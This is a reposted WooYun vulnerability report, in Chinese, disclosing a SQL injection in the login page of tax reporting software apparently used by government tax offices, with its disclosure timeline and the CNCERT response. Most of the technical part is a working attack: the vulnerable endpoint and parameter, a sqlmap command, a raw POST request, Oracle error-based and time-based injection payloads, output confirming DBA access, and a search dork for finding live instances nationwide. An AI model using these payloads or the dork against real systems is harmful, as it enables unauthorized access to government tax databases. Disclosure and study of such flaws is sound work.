某通用税务软件SQL注入漏洞

admin
admin
admin
140873
文章
117
评论
2015年4月27日06:23:48评论509 views字数 238阅读0分47秒阅读模式
摘要

2014-07-12: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-08: 细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2014-68010

漏洞标题: 某通用税务软件SQL注入漏洞 某通用税务软件SQL注入漏洞

相关厂商: 北京亿信华辰软件有限责任公司

漏洞作者: loli某通用税务软件SQL注入漏洞

提交时间: 2014-07-12 15:50

公开时间: 2014-10-08 15:52

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: SQL注入 登陆框注入

1人收藏

漏洞详情

披露状态:

2014-07-12: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-08: 细节向公众公开

简要描述:

GOV开发商们该交学费了

详细说明:

统计报表及重点税源管理软件是应用于国家税务总局税收计划、会计统计核算、重点税源管理、大企业税收管理等业务领域的报表管理、数据统计分析平台。整个软件平台由税收计会统报表系统(TRS)、重点税源管理系统(TRAS)、大企业税收管理系统(VICDP)、税收数据分析系统(WTAP)组成。

-------------------------------------------------------------------------

登陆框注入,随便丢了个单引号就爆语句了。。。

code 区域 
http://**.**.**.**:99/i/oem/grpslogin.jsp
 
 
某通用税务软件SQL注入漏洞

 
某通用税务软件SQL注入漏洞

 
 <code>
 
 直接丢SQLMap里跑就行了,漏洞参数id:
 
 ./sqlmap.py -r test.txt -p id --is-dba
 <code>
 
 POST /i/oem/grpslogin.jsp HTTP/1.1
 Host: **.**.**.**:99
 Proxy-Connection: keep-alive
 Content-Length: 45
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://**.**.**.**:99
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://**.**.**.**:99/i/oem/grpslogin.jsp
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
 Cookie: JSESSIONID=2v2nT97LN6ylvDRB2bQTYXSJld6J5Tm2vvT6182H3Z1mG17N6cvF!-141727717
 
 taskGroup=ZDSY&id=aaaa&opid=1&noleft=0&pw=aaa
code 区域 
Place: POST
 Parameter: id
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: taskGroup=ZDSY&id=aaaa' AND 8581=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (8581=8581) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(102)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'GMad'='GMad&opid=1&noleft=0&pw=aaa
 
     Type: AND/OR time-based blind
     Title: Oracle OR time-based blind
     Payload: taskGroup=ZDSY&id=-9365' OR 5766=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(78)||CHR(109)||CHR(85),5) AND 'VquD'='VquD&opid=1&noleft=0&pw=aaa
 ---
 [11:33:18] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle
 [11:33:18] [INFO] testing if current user is DBA
 [11:33:22] [WARNING] reflective value(s) found and filtering out
 current user is DBA:    True

漏洞证明:

GOV的就不去猜表了。

code 区域 
---
 [11:42:58] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle
 [11:42:58] [INFO] fetching current database
 [11:42:58] [INFO] resumed: IRPT
 [11:42:58] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
 current schema (equivalent to database on Oracle):    'IRPT'

google随便找点吧。(貌似全国都是用的这一家):

inurl:/grpslogin.jsp

修复方案:

过滤。

版权声明:转载请注明来源 loli@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-07-15 09:59

厂商回复:

CNVD确认若干实例,同时确认为垂直行业专用定制系统,根据测试实例,转由CNCERT向对应的多个分中心下发处置案例,同时由CNCERT向国家上级信息安全协调机构通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin